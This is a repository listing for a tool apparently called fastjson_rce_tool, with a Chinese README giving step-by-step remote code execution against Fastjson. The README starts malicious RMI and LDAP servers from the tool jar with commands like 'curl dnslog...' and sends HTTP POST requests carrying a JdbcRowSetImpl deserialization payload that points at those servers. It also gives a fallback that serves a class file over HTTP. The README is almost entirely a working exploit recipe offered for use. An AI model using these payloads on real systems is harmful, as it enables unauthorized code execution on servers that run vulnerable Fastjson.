├── 2.png ├── README.md ├── fastjson_tool.jar └── work.png /2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nnewkin/fastjson_rce_tool/bba755f6c5f5fc27033de8534bec1f89e5c742ef/2.png -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # fastjson_rce_tool 2 | 3 | ``` 4 | 随着各种关于安全的法律出台,该项目2020年初开始不对外开放。 5 | 6 | 备注:这里的利用方式可以突破一些限制条件,来完成命令执行。 7 | 8 | 9 | rmi: 10 | 1. 启动RMI服务,后面写要执行的语句(有依赖,tomcat8稳定复现) 11 | java -cp fastjson_tool.jar EvilRMIServer 8888 53 "curl dnslog.wyzxxz.cn" 12 | 13 | 2. 发送请求包 14 | POST /test HTTP/1.1 15 | Host: 127.0.0.1 16 | Content-Type: application/json 17 | Accept-Encoding: gzip, deflate 18 | Connection: close 19 | Accept: */* 20 | User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_3_1 like Mac OS X) 21 | 22 | {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:8888/Object","autoCommit":true} 23 | 24 | 3. 查看日志是否curl成功 25 | 26 | =================================================================================================== 27 | 28 | ldap: 29 | 1. 启动LDAP服务,后面写要执行的语句 30 | java -cp fastjson_tool.jar LDAPRefServer2 8888 CommonsCollections1 "curl dnslog.cn" 31 | 32 | 2. 发送请求包 33 | POST /test HTTP/1.1 34 | Host: 127.0.0.1 35 | Content-Type: application/json 36 | Accept-Encoding: gzip, deflate 37 | Connection: close 38 | Accept: */* 39 | User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 12_3_1 like Mac OS X) 40 | 41 | {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://127.0.0.1:8888/Object","autoCommit":true} 42 | 43 | 44 | 3. 查看日志是否执行成功 45 | 46 | =================================================================================================== 47 | else: 48 | 49 | 有些环境可能利用不成功,可以尝试默认的测试方法, 50 | 例如: 51 | 生成测试的class文件,启动http服务器 52 | 启动ldap服务,从http服务获取class 53 | java -cp fastjson_tool.jar LDAPRefServer http://ip:port/#Object 8888 54 | 55 | ``` 56 | 57 | 58 | ![0](https://github.com/wyzxxz/fastjson_rce_tool/blob/master/work.png) 59 | 60 | ![1](https://github.com/wyzxxz/fastjson_rce_tool/blob/master/2.png) 61 | 62 | -------------------------------------------------------------------------------- /fastjson_tool.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nnewkin/fastjson_rce_tool/bba755f6c5f5fc27033de8534bec1f89e5c742ef/fastjson_tool.jar -------------------------------------------------------------------------------- /work.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/nnewkin/fastjson_rce_tool/bba755f6c5f5fc27033de8534bec1f89e5c742ef/work.png --------------------------------------------------------------------------------